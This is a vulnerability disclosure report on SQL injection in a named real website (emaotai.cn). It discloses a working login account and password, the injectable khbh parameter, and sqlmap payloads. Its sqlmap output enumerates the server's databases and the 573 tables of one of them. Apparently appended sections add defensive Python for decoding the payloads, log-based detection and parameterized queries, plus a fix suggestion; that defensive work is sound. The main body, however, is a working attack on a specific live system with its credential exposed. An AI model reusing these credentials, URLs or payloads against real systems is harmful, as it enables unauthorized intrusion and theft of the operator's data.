WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------------- http://drop.zone.ci/
2015-11-12: Details reported to the vendor, awaiting the vendor's handling. 2015-11-25: The vendor has actively ignored the vulnerability; details are disclosed to the public.
http://www.emaotai.cn:90/zyd/
Account: wanglei  Password: 123456
Injection point
www.emaotai.cn:90/zyd/Member/JlrList.aspx?khbh=20130523000007
    Payload: khbh=20130523000007' AND 4064=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4064=4064) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(122)+CHAR(113))) AND 'sQAa'='sQAa

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: khbh=20130523000007';WAITFOR DELAY '0:0:5'--
---
[23:14:40] [INFO] testing Microsoft SQL Server
[23:14:40] [INFO] confirming Microsoft SQL Server
[23:14:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[23:14:41] [INFO] fetching database names
[23:14:42] [INFO] the SQL query used returns 18 entries
[23:14:42] [INFO] retrieved: distribution
[23:14:42] [INFO] retrieved: DrpEco
[23:14:43] [INFO] retrieved: drpecosdl
[23:14:43] [INFO] retrieved: DrpEcoTest
[23:14:43] [INFO] retrieved: eAct
[23:14:44] [INFO] retrieved: eActTest
[23:14:44] [INFO] retrieved: emaotai_act
[23:14:44] [INFO] retrieved: emaotai_act_test
[23:14:45] [INFO] retrieved: emaotai_logs
[23:14:45] [INFO] retrieved: hishop
[23:14:45] [INFO] retrieved: master
[23:14:46] [INFO] retrieved: model
[23:14:46] [INFO] retrieved: moutai
[23:14:46] [INFO] retrieved: moutaitest
[23:14:47] [INFO] retrieved: msdb
[23:14:47] [INFO] retrieved: ReportServer
[23:14:47] [INFO] retrieved: ReportServerTempDB
[23:14:48] [INFO] retrieved: tempdb
available databases [18]:
[*] distribution
[*] DrpEco
[*] drpecosdl
[*] DrpEcoTest
[*] eAct
[*] eActTest
[*] emaotai_act
[*] emaotai_act_test
[*] emaotai_logs
[*] hishop
[*] master
[*] model
[*] moutai
[*] moutaitest
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
    Payload: khbh=20130523000007' AND 4064=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4064=4064) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(122)+CHAR(113))) AND 'sQAa'='sQAa

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: khbh=20130523000007';WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
Database: moutai
[573 tables]
+--------------------------------+
| Mail_Book                      |
| Mail_BookMark                  |
| Mail_Paper_Article             |
| Mail_Paper_Articleimage        |
| Mail_Paper_ImageNews           |
| Mail_Paper_ImageNews_Style     |
| Mail_Paper_article_Class       |
| Mail_Paper_article_style       |
| Mail_Paper_class               |
| Mail_Paper_style               |
| Mail_Papers                    |
| Mail_accessory                 |
| Mail_logs                      |
| Office_template                |
| Paper_Article                  |
| Paper_ImageNews                |
| Paper_ImageNews_Style          |
| Paper_article_Class            |
| Paper_class                    |
| Paper_style                    |
| Papers                         |
| RFID_CK                        |
| RFID_CKD                       |
| RFID_KH                        |
| RFID_SPML                      |
| RFID_ZKD                       |
| SolarData                      |
| T_ckgl_gyxshz                  |
| VIEW1                          |
| VIEW2                          |
| VIEW2_cnsk                     |
| VIEW_cnsk                      |
| V_ckgl_dbdzzrk                 |
| V_fpmx_dr                      |
| V_fpt_dr                       |
| V_gyfpmx_dr                    |
| V_hydbd                        |
| V_hyfp                         |
| V_kpdmc                        |
| V_testfp                       |
| V_testfpmx                     |
| V_xsgl_htzxqk                  |
| V_xsgl_hz                      |
| V_xsgl_hz1                     |
| V_xsgl_khhz                    |
| V_xsgl_khhz1                   |
| V_xsgl_wdhz                    |
| V_xsgl_wdhz1                   |
| V_xsgl_xskhhz                  |
| V_xsgl_xskphz                  |
| V_xsgl_xswdhz                  |
| V_xsxtkhhz                     |
| V_xsxtwdhz                     |
| V_xsxtwdyj                     |
| Vv_gyfpmx                      |
| Vvv_fpmxdr                     |
| Vvv_fptdr                      |
| Vvv_gyfpmxdr                   |
| atest                          |
| bak_2010_wsh                   |
| bak_2010_ysh                   |
| bak_khgl_khxx                  |
| dtproperties                   |
| favorite_url                   |
| fpck_20040513                  |
| lsht                           |
| lshtghmx                       |
| lshtthsjsl                     |
| lskhxx                         |
| lst_htgl_fpkpqk                |
| lst_htgl_fpkpqk_yf             |
| lst_htgl_htthjh                |
| lst_htgl_htzl                  |
| lst_htgl_htzl_yf               |
| lst_htgl_htzxqk                |
| lst_htgl_khdg                  |
| lst_jhgl_wdjhzx                |
| lst_khgl_ghqkbd                |
| lst_khgl_sfkhsl                |
| lst_khgl_wdkhsl                |
| lst_xsgl_bzfx                  |
| lst_xsgl_dqrgm                 |
| lst_xsgl_dqygm                 |
| lst_xsgl_fpkpsp                |
| lst_xsgl_htsp                  |
| lst_xsgl_htzx                  |
| lst_xsgl_khgmdb                |
| lst_xsgl_khrgm                 |
| lst_xsgl_khygm                 |
| lst_xsgl_nzsb                  |
| lst_xsgl_qypzdb                |
| lst_xsgl_qyxs                  |
| lst_xsgl_spytj                 |
| lst_xsgl_spytj_nz              |
| lst_xsgl_spzltj                |
| lst_xsgl_wdrgm                 |
| lst_xsgl_wdygm                 |
| lst_xsgl_xsnzs                 |
| lst_xsgl_xsqktj                |
| lst_xsgl_yf                    |
| lst_xsgl_zlrzs                 |
| lst_xsgl_zlyzs                 |
| lst_xsgl_zsb                   |
| lst_yxwd_pq                    |
| lst_yxwdgl_wdjhzx              |
| lst_yxwdgl_wdxsjhzx            |
| map_kh                         |
| material_Paper_Article         |
| material_Paper_Articleimage    |
| material_Paper_ImageNews       |
| material_Paper_ImageNews_Style |
| material_Paper_article_Class   |
| material_Paper_article_style   |
| material_Paper_class           |
| material_Paper_style           |
| material_Papers                |
| order1                         |
| order2                         |
| paper_Articleimage             |
| paper_article_style            |
| pz200409                       |
| pz_tmp                         |
| pz_tmp1                        |
| r3dm0v3_sql                    |
| sysdiagrams                    |
| t_Sys_tip                      |
| t_b2b_icbc_pament              |
| t_b2b_pament_config            |
| t_b2b_tzcs                     |
| t_b2b_yjb                      |
| t_bak_htgl_htthjh              |
| t_bak_htgl_htthjh_无合同         |
| t_bak_htgl_htthjht             |
| t_ckgl_byd                     |
| t_ckgl_bygda                   |
| t_ckgl_ckbgy                   |
| t_ckgl_ckdm                    |
| t_ckgl_ckdm_tree               |
| t_ckgl_ckkchz                  |
| t_ckgl_ckkcxthz                |
| t_ckgl_ckspml                  |
| t_ckgl_cktz                    |
| t_ckgl_ckxtqh                  |
| t_ckgl_kcsl                    |
| t_ckgl_kctz                    |
| t_ckgl_kctz001                 |
| t_ckgl_kctz_20050303           |
| t_ckgl_kctz_bak_gx_20070129    |
| t_ckgl_kctz_gf                 |
| t_ckgl_kctz_发票已审台帐未审完         |
| t_ckgl_lld                     |
| t_ckgl_lld_201312              |
| t_ckgl_lldmx                   |
| t_ckgl_lldmx_201312            |
| t_ckgl_ls_xsfp                 |
| t_ckgl_ndzz                    |
| t_ckgl_sld                     |
| t_ckgl_sldmx                   |
| t_ckgl_spck                    |
| t_ckgl_spck_20050308           |
| t_ckgl_spdb                    |
| t_ckgl_spdbmx                  |
| t_ckgl_sprk                    |
| t_ckgl_sprk_20060308           |
| t_ckgl_tzml                    |
| t_ckgl_wdyjh                   |
| t_ckgl_zzck                    |
| t_ckgl_zzkc                    |
| t_ckgl_zzrk                    |
| t_crm_bzwt                     |
| t_crm_fwrq                     |
| t_crm_lddj                     |
| t_crm_lpb                      |
| t_crm_lpbz                     |
| t_crm_lpbzmxb                  |
| t_crm_lpmxb                    |
| t_crm_selected                 |
| t_crm_sljtzd                   |
| t_crm_sljtzdmx                 |
| t_cwgl_cxf_bsb                 |
| t_cwgl_cxf_bsmxb               |
| t_cwgl_grwlz                   |
| t_cwgl_jlsh                    |
| t_cwgl_jlsh_bak1               |
| t_cwgl_jlsh_bak2               |
| t_cwgl_mask                    |
| t_cwgl_pjsh                    |
| t_cwgl_wlz                     |
| t_cwgl_xjsk                    |
| t_cwgl_xsfpsk                  |
| t_cwgl_xsfpzz                  |
| t_cwgl_xspz                    |
| t_cwgl_zrz                     |
| t_cwgl_zzsh                    |
| t_cx_Rpt                       |
| t_cx_Rpt_bak                   |
| t_cx_sql                       |
| t_cxgl_cxfa                    |
| t_cxgl_cxfamxb                 |
| t_cxgl_cxfamxb_lsjl            |
| t_cxgl_cxjh                    |
| t_cxgl_fybl                    |
| t_cxgl_hz                      |
| t_dzsw_notice                  |
| t_dzsw_notice_bak              |
| t_dzsw_notice_class            |
| t_dzsw_notice_image            |
| t_dzsw_notice_style            |
| t_dzsw_notice_ydjl             |
| t_gy_ckgl_kctz                 |
| t_gy_ckkchz                    |
| t_gy_spck                      |
| t_gy_sprk                      |
| t_gy_xsfpmx                    |
| t_gy_xsfpt                     |
| t_gy_xskh                      |
| t_help_book                    |
| t_htgl_htlxbm                  |
| t_htgl_htthjh                  |
| t_htgl_htthjh_20060517         |
| t_htgl_htthjht                 |
| t_htgl_htwcqk                  |
| t_jgjk_cjdmlb                  |
| t_jgjk_cjdmxb                  |
| t_jgjk_hqqk                    |
| t_jgjk_jghqbt                  |
| t_jgjk_jghqmxb                 |
| t_jgjk_rwb                     |
| t_jgjk_spmlb                   |
| t_jhgl_cgjh                    |
| t_jhgl_cgjhmx                  |
| t_khgl_dkqk                    |
| t_khgl_gzhzb                   |
| t_khgl_khgl                    |
| t_khgl_khgz                    |
| t_khgl_khmp                    |
| t_khgl_khpj                    |
| t_khgl_khshfk                  |
| t_khgl_khspdz                  |
| t_khgl_khxx                    |
| t_khgl_khxxbi                  |
| t_khgl_khyx                    |
| t_khgl_kpwd                    |
| t_khgl_lskh                    |
| t_khgl_spml                    |
| t_khgl_sywj                    |
| t_pjgl_01                      |
| t_pjgl_02                      |
| t_pjgl_02_bak                  |
| t_pjgl_03                      |
| t_pjgl_04                      |
| t_pjgl_05                      |
| t_pjgl_bmbm                    |
| t_pjgl_cfkh                    |
| t_pjgl_cfpq                    |
| t_pjgl_hzb01                   |
| t_pjgl_hzbmx01                 |
| t_pjgl_khdx                    |
| t_pjgl_khdx081030              |
| t_pjgl_pjxmb                   |
| t_post_info                    |
| t_prog_qg                      |
| t_psgl_clb                     |
| t_psgl_cysb                    |
| t_psgl_czdab                   |
| t_psgl_hyfymx                  |
| t_psgl_hyspmx                  |
| t_psgl_hyxx                    |
| t_psgl_jsb                     |
| t_psgl_jsbmxb                  |
| t_psgl_jsyb                    |
| t_psgl_lxr                     |
| t_psgl_yfjsb                   |
| t_psgl_yfjsb_shmx              |
| t_psgl_yfjsbmx                 |
| t_psgl_ysfybz                  |
| t_rfid_map                     |
| t_scfx_fxjg                    |
| t_scfx_qyfw                    |
| t_scfx_schf                    |
| t_scfx_scys                    |
| t_scxx_dcjs                    |
| t_scxx_dcnr                    |
| t_scxx_dcry                    |
| t_scxx_document                |
| t_scxx_nomtsp                  |
| t_scxx_sc                      |
| t_scxx_scdc                    |
| t_scxx_scdc_bak                |
| t_scxx_scdcold                 |
| t_scxx_sctx                    |
| t_splc_signimg                 |
| t_splc_spjl                    |
| t_splc_splc                    |
| t_splc_spry                    |
| t_sys_Columdef                 |
| t_sys_Form                     |
| t_sys_FormGridParams           |
| t_sys_FormStoredClass          |
| t_sys_ServerClock              |
| t_sys_StoreProc                |
| t_sys_backup                   |
| t_sys_codelib                  |
| t_sys_download                 |
| t_sys_fielddef                 |
| t_sys_formlinks                |
| t_sys_grid                     |
| t_sys_help                     |
| t_sys_help_chm                 |
| t_sys_images                   |
| t_sys_keycode                  |
| t_sys_logs                     |
| t_sys_menu                     |
| t_sys_menu_bak                 |
| t_sys_menu_permit              |
| t_sys_menu_permit_bak          |
| t_sys_menu_requests            |
| t_sys_menuuser                 |
| t_sys_message                  |
| t_sys_msg                      |
| t_sys_newkey                   |
| t_sys_notice                   |
| t_sys_project                  |
| t_sys_queue                    |
| t_sys_requirement              |
| t_sys_rpt                      |
| t_sys_rptjoin                  |
| t_sys_rtptables                |
| t_sys_scene                    |
| t_sys_subject                  |
| t_sys_subject_relation         |
| t_sys_suggestion               |
| t_sys_tabledef                 |
| t_sys_ticket                   |
| t_sys_ticket_sub               |
| t_sys_workflow                 |
| t_sys_works                    |
| t_test_odata                   |
| t_tot_yxwd_xsl                 |
| t_wldd_mrjh                    |
| t_wldd_psapb                   |
| t_wldd_psapmxb                 |
| t_wldd_sfd                     |
| t_wldd_sfdmx                   |
| t_wlgs_cljsb                   |
| t_wlgs_cljsmxb                 |
| t_xsgl_day                     |
| t_xsgl_ht                      |
| t_xsgl_htghmx                  |
| t_xsgl_htspdz                  |
| t_xsgl_htthsjsl                |
| t_xsgl_htzxqk                  |
| t_xsgl_month                   |
| t_xsgl_nddyb                   |
| t_xsgl_scjhb                   |
| t_xsgl_scjhmx                  |
| t_xsgl_wdxshz                  |
| t_xsgl_wdyjhz                  |
| t_xsgl_xsfpmx                  |
| t_xsgl_xsfpt                   |
| t_xsgl_xsfpt_20070321          |
| t_xsgl_xsfpt_串库票_20070321     |
| t_xsgl_xsxthz                  |
| t_xsgl_zsgh                    |
| t_xsgl_zsghmx                  |
| t_xtgl_caryjs                  |
| t_xtgl_company                 |
| t_xtgl_config                  |
| t_xtgl_czjsb                   |
| t_xtgl_czjsb_bak               |
| t_xtgl_czry                    |
| t_xtgl_czry_bak                |
| t_xtgl_czry_pjflbm             |
| t_xtgl_czryjs                  |
| t_xtgl_czryjs_bak              |
| t_xtgl_czryqx                  |
| t_xtgl_dm                      |
| t_xtgl_jsgsb                   |
| t_xtgl_jsqx                    |
| t_xtgl_mailslot                |
| t_xtgl_mailxx                  |
| t_xtgl_rjmkbmb                 |
| t_xtgl_rjmkbmb_bak             |
| t_xtgl_spjg                    |
| t_xtgl_spml                    |
| t_xtgl_spsx                    |
| t_xtgl_tjlb                    |
| t_xtgl_tjsplb                  |
| t_xtgl_tjspml                  |
| t_xtgl_xsfqryb                 |
| t_xtgl_xtcs                    |
| t_xtgl_xzcs                    |
| t_xtgl_xzcs_071102             |
| t_xtgl_xzcs_bak                |
| t_xtgl_xzdq                    |
| t_xtgl_xzqh                    |
| t_xtgl_xzqh20030922            |
| t_xtgl_xzqh_4                  |
| t_xtgl_xzqh_bak                |
| t_xtgl_xzqh_ds                 |
| t_xtgl_xzqh_err                |
| t_xtgl_xzqh_sf                 |
| t_xtgl_xzqh_sx                 |
| t_xtgl_xzsf                    |
| t_ysjk_ysqkdjb                 |
| t_yxwdgl_gzb                   |
| t_yxwdgl_gzb2                  |
| t_yxwdgl_gzb_20121013          |
| t_yxwdgl_gzb_ry                |
| t_yxwdgl_gzbt                  |
| t_yxwdgl_gzbt_20121013         |
| t_yxwdgl_gzhzb                 |
| t_yxwdgl_gzjl                  |
| t_yxwdgl_gzry                  |
| t_yxwdgl_gzry2                 |
| t_yxwdgl_gzry_20121013         |
| t_yxwdgl_wdjhmx                |
| t_yxwdgl_wdpj                  |
| t_yxwdgl_wdxsjht               |
| t_yxwdgl_xxfkb                 |
| t_yxwdgl_xxfkb_2013            |
| t_yxwdgl_yxrygz                |
| t_yxwdgl_yxwd                  |
| t_yxwdgl_yxwd080423            |
| t_yxwdgl_yxwd2                 |
| t_yxwdgl_yxwd3                 |
| t_yxwdgl_yxwd_bak              |
| t_yxwdgl_yxwdbd                |
| t_yxwdgl_yxwdgxqyb             |
| t_yxwdgl_yxwdtz                |
| t_yxwdgl_yxwdxtqh              |
| t_zmdgl_Maps                   |
| t_zmdgl_clffmxb                |
| t_zmdgl_clml                   |
| t_zmdgl_ghjsb                  |
| t_zmdgl_ghjstjb                |
| t_zmdgl_jckhb                  |
| t_zmdgl_jckhmx                 |
| t_zmdgl_jsqkb                  |
| t_zmdgl_khxmb                  |
| t_zmdgl_sqb                    |
| t_zmdgl_yjzmd                  |
| t_zmdgl_ysb                    |
| t_ztpzcs_extscript             |
| t_ztpzcs_tablist               |
| t_ztpzgl_pzcs                  |
| tmp1                           |
| tmp_20041月出库2月收款部分            |
| tmp_2005年压单到2006年644笔         |
| tmp_bgy                        |
| tmp_cktz_zz                    |
| tmp_cwpz_2012                  |
| tmp_gwl1                       |
| tmp_gwl2                       |
| tmp_kctz_20041227              |
| tmp_lskh                       |
| tmp_rfid_ckd                   |
| tmp_t_ckgl_spck_20050418       |
| tmp_wsh2010                    |
| tmp_xsfp                       |
| tmp_xsfpt_bak_20070611         |
| tmp_xzcs_xh                    |
| tmp_xzsf                       |
| tmp_ycje                       |
| tmp_ycpz                       |
| tmp_ysh2010                    |
| tmp_yxwd001                    |
| tmp_zmd81                      |
| v_b2b_order                    |
| v_b2b_order_detail             |
| v_ckgl_allck                   |
| v_ckgl_ckdm                    |
| v_ckgl_dbd                     |
| v_ckgl_kctz_fp                 |
| v_ckgl_lld                     |
| v_ckgl_ncsz                    |
| v_ckgl_qcsz                    |
| v_ckgl_spml_InTz               |
| v_ckgl_xszk                    |
| v_ckgl_yxck                    |
| v_ckgl_ztcxck                  |
| v_ckgl_zzdb                    |
| v_ckgl_zzk                     |
| v_crm_ldjl                     |
| v_crm_lxr                      |
| v_crm_lxrsr                    |
| v_cth_Test                     |
| v_customer_tax                 |
| v_cwgl_cxf_bsb                 |
| v_cwgl_xsfp_jlsh               |
| v_cwgl_xsfpdata                |
| v_cwgl_xsfpjjb                 |
| v_cwgl_xsfpsk                  |
| v_cwgl_xsfpzz                  |
| v_cxgl_cxfa                    |
| v_cxgl_cxfa_list               |
| v_cxgl_cxjh                    |
| v_cxgl_cxjh_list               |
| v_dgzn_wdlist                  |
| v_jgjk_jgavg                   |
| v_jgjk_jghqmxb                 |
| v_kcgl_xsfp                    |
| v_khgl_lxr                     |
| v_pos_rkd                      |
| v_pos_rkd_yun                  |
| v_pos_xsd                      |
| v_pos_xsd_yun                  |
| v_psgl_hyspmx                  |
| v_psgl_hyxx                    |
| v_psgl_jsyb                    |
| v_pzgl_xspz                    |
| v_rfid_ckd                     |
| v_rfid_map                     |
| v_rfid_perstore                |
| v_rfid_totstore                |
| v_splc_signimg                 |
| v_splc_spjl                    |
| v_splc_spjl_sign               |
| v_splc_spry                    |
| v_t_scxx_dcnr                  |
| v_ticket_customer_tax          |
| v_ticket_customer_tax_all      |
| v_ticket_tax                   |
| v_ticket_tax_all               |
| v_tot_yxwd_xsl                 |
| v_tot_yxwd_xsl_wan             |
| v_wdjhzx                       |
| v_wdjhzx_js0                   |
| v_wdjhzx_js0_wzx               |
| v_wdjhzx_wzx                   |
| v_wdjhzxqk                     |
| v_wdjhzxqk_js0                 |
| v_wdjhzxqk_js0_wzx             |
| v_wdjhzxqk_wzx                 |
| v_wdyj_nz                      |
| v_wdyj_nz_js0                  |
| v_wldd_psapb                   |
| v_wldd_sfdmx                   |
| v_xsgl_khrgm                   |
| v_xsgl_khygm                   |
| v_xsgl_lsfp                    |
| v_xsgl_order_xsfp              |
| v_xsgl_scjh_kc                 |
| v_xsgl_spytj                   |
| v_xsgl_spytj_nsk               |
| v_xsgl_spytj_sk                |
| v_xsgl_wdrhz                   |
| v_xsgl_wdyhz                   |
| v_xsgl_xsfp                    |
| v_xsgl_xsfp2                   |
| v_xsgl_xsfp_jjb                |
| v_xsgl_xsfp_jlsh               |
| v_xsgl_xsfp_jlsh2              |
| v_xsgl_xsfp_list               |
| v_xsgl_xsgskpcx                |
| v_xsgl_xskhrtj                 |
| v_xsgl_xsrtj                   |
| v_xsgl_xsytj                   |
| v_xsgl_xsytj_nz                |
| v_xsgl_xsytj_nzs               |
| v_xzqh                         |
| v_yxwdgl_xxfkb                 |
| v_yxwdgl_yjfklb                |
| v_yxwl_dqdb                    |
| v_yxwl_dqzs                    |
| vv_gyfpt                       |
| xspz_200301                    |
| 中枢专卖店调拨总量查询                    |
| 仓库代码为空的发票                      |
| 仓库代码为空的发票2                     |
| 已审已出20060926                   |
| 改动成本发票20030818                 |
| 角色表                            |
+--------------------------------+
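The two payloads sqlmap printed above read more clearly once the CHAR() chains are decoded, and they are also what a defender would key on in the IIS logs. The following Python is an added example written for this page, not tooling from the report or from sqlmap: it decodes the marker strings from the error-based payload and runs a handful of signature checks over constructed IIS W3C log lines. The log lines, their field layout, the client address 203.0.113.7 and the time-taken values are all made up for the example; only the two payloads are the report's.

```python
import re
from urllib.parse import quote, unquote_plus

# The two payloads from the sqlmap output above, as the application receives them
# (the "khbh=" prefix stripped).
ERROR_BASED = ("20130523000007' AND 4064=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)"
               "+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4064=4064) THEN CHAR(49) ELSE "
               "CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(122)+CHAR(113))) "
               "AND 'sQAa'='sQAa")
STACKED = "20130523000007';WAITFOR DELAY '0:0:5'--"

_CHAR_RUN = re.compile(r"CHAR\(\d+\)(?:\+CHAR\(\d+\))*", re.IGNORECASE)


def decode_char_runs(payload):
    """Return each CHAR(n)+CHAR(m)+... run as the string SQL Server builds from it.

    For ERROR_BASED this yields sqlmap's delimiters 'qpvzq' and 'qkbzq' around a CASE
    that evaluates to '1' or '0'.  CONVERT(INT, 'qpvzq1qkbzq') cannot succeed, and the
    SQL Server conversion error quotes the offending value back in its message, which
    is the channel the extracted data travels over.
    """
    return ["".join(chr(int(n)) for n in re.findall(r"\d+", run.group(0)))
            for run in _CHAR_RUN.finditer(payload)]


# Signature rules for query strings hitting an ASP.NET/SQL Server site, written around
# the techniques sqlmap used here.  Case-insensitive, applied after URL decoding.
RULES = {
    "mssql-error-based-convert": re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I),
    "char-concatenation":        re.compile(r"CHAR\(\d+\)\s*\+\s*CHAR\(\d+\)", re.I),
    "mssql-stacked-waitfor":     re.compile(r";\s*WAITFOR\s+DELAY\b", re.I),
    "string-tautology":          re.compile(r"'(\w+)'\s*=\s*'\1\b", re.I),
}


def classify(query_string):
    """Names of every rule the URL-decoded query string trips, in RULES order."""
    decoded = unquote_plus(query_string)
    return [name for name, rx in RULES.items() if rx.search(decoded)]


# Constructed IIS W3C log lines (not from the report): one normal request, then the
# two probes as IIS records them, with cs-uri-query URL-encoded.  The field layout,
# the client address 203.0.113.7 and the time-taken values are assumptions.
FIELDS = ("date time cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status "
          "time-taken").split()
SAMPLE_LOG = [
    "#Fields: " + " ".join(FIELDS),
    "2015-11-12 15:14:30 GET /zyd/Member/JlrList.aspx khbh=20130523000007 90 203.0.113.7 200 41",
    "2015-11-12 15:14:40 GET /zyd/Member/JlrList.aspx khbh=" + quote(ERROR_BASED)
    + " 90 203.0.113.7 500 58",
    "2015-11-12 15:14:41 GET /zyd/Member/JlrList.aspx khbh=" + quote(STACKED)
    + " 90 203.0.113.7 200 5071",
]


def scan_iis(lines):
    """Return (c-ip, cs-uri-stem, hits) for every request that trips a rule."""
    findings = []
    for line in lines:
        if line.startswith("#"):          # W3C directives such as #Fields:
            continue
        rec = dict(zip(FIELDS, line.split(" ")))
        hits = classify(rec["cs-uri-query"])
        # A WAITFOR DELAY '0:0:5' that really executed shows as ~5 s of time-taken
        # (milliseconds): the stacked query ran, it was not merely logged.
        if "mssql-stacked-waitfor" in hits and int(rec["time-taken"]) >= 5000:
            hits.append("delay-confirmed")
        if hits:
            findings.append((rec["c-ip"], rec["cs-uri-stem"], hits))
    return findings


if __name__ == "__main__":
    print(decode_char_runs(ERROR_BASED))
    for finding in scan_iis(SAMPLE_LOG):
        print(finding)
```

The rules are deliberately narrow (they match what this scanner sent, not every injection), so they belong next to a generic rule set rather than in place of one; the time-taken correlation is the cheap way to tell a stacked-query probe that executed from one the application rejected.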
Fix suggestion: change the account's password (wanglei / 123456 is trivially guessed), and stop building the SQL text from the khbh parameter; pass it as a bound query parameter instead of relying on filtering SQL special characters.
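To show why a bound parameter, rather than character filtering, is the fix, here is an added example that is not the site's ASP.NET code (which is not available): it models the JlrList.aspx lookup in Python with sqlite3 standing in for the SQL Server 2008 backend. The table name jlr, its columns and rows are constructed for the demonstration, and the assumption that khbh is spliced into a quoted string is taken from the shape of the sqlmap payloads above. The boolean oracle sqlmap used (' AND 'sQAa'='sQAa) is replayed against the concatenating version and then against the parameterized one, and the quote-stripping "filter" is shown holding in the string context but failing in a numeric one.

```python
import sqlite3

# sqlite3 stands in for SQL Server 2008 (assumption: the concatenation pattern is the
# same; the real ASP.NET code is not available).  Table jlr, its columns and rows are
# constructed for this example; the customer number 20130523000007 is the one in the
# report's URL.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jlr (id INTEGER PRIMARY KEY, khbh TEXT, name TEXT)")
    conn.executemany("INSERT INTO jlr (khbh, name) VALUES (?, ?)", [
        ("20130523000007", "customer A"),
        ("20130523000008", "customer B"),
        ("20130523000009", "customer C"),
    ])
    return conn


def jlr_list_vulnerable(conn, khbh):
    """The pattern sqlmap's findings imply: the parameter becomes part of the SQL text."""
    sql = "SELECT id, name FROM jlr WHERE khbh = '" + khbh + "'"
    return conn.execute(sql).fetchall()


def jlr_list_parameterized(conn, khbh):
    """The fix: the value is bound separately, so a quote inside it is only data.
    In ASP.NET the equivalent is SqlCommand with SqlParameter, never string.Format."""
    return conn.execute("SELECT id, name FROM jlr WHERE khbh = ?", (khbh,)).fetchall()


def strip_quotes(value):
    """The report's "filter SQL special characters" idea in its usual minimal form."""
    return value.replace("'", "")


def by_id_vulnerable(conn, id_text):
    """Same mistake in a numeric context: no quote to close, so no quote to strip."""
    return conn.execute("SELECT id, name FROM jlr WHERE id = " + id_text).fetchall()


def demo():
    conn = make_db()
    return {
        # sqlmap's boolean oracle: a true clause keeps the row, a false one hides it
        "oracle_true":  jlr_list_vulnerable(conn, "20130523000007' AND '1'='1"),
        "oracle_false": jlr_list_vulnerable(conn, "20130523000007' AND '1'='2"),
        # a tautology dumps every row from the concatenating version ...
        "dump_all":     jlr_list_vulnerable(conn, "x' OR 'a'='a"),
        # ... and returns nothing from the parameterized one: no row has that khbh
        "param_attack": jlr_list_parameterized(conn, "x' OR 'a'='a"),
        "param_normal": jlr_list_parameterized(conn, "20130523000007"),
        # quote stripping blocks the quoted-string case ...
        "filtered_str": jlr_list_vulnerable(conn, strip_quotes("x' OR 'a'='a")),
        # ... but not a numeric context, which needs no quote at all
        "filtered_num": by_id_vulnerable(conn, strip_quotes("1 OR 1=1")),
    }


if __name__ == "__main__":
    for key, rows in demo().items():
        print(f"{key:13s} {len(rows)} row(s): {rows}")
```

The stacked WAITFOR DELAY probe from the report is not reproduced here because sqlite3's execute() refuses multiple statements; on SQL Server it runs, which is why the parameterized form matters there even more than the tautology cases show.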
Hazard level: No impact (vendor ignored)
Ignored at: 2015-11-25 05:08
Vulnerability Rank: 4 (WooYun rating)
Vendor reply: none yet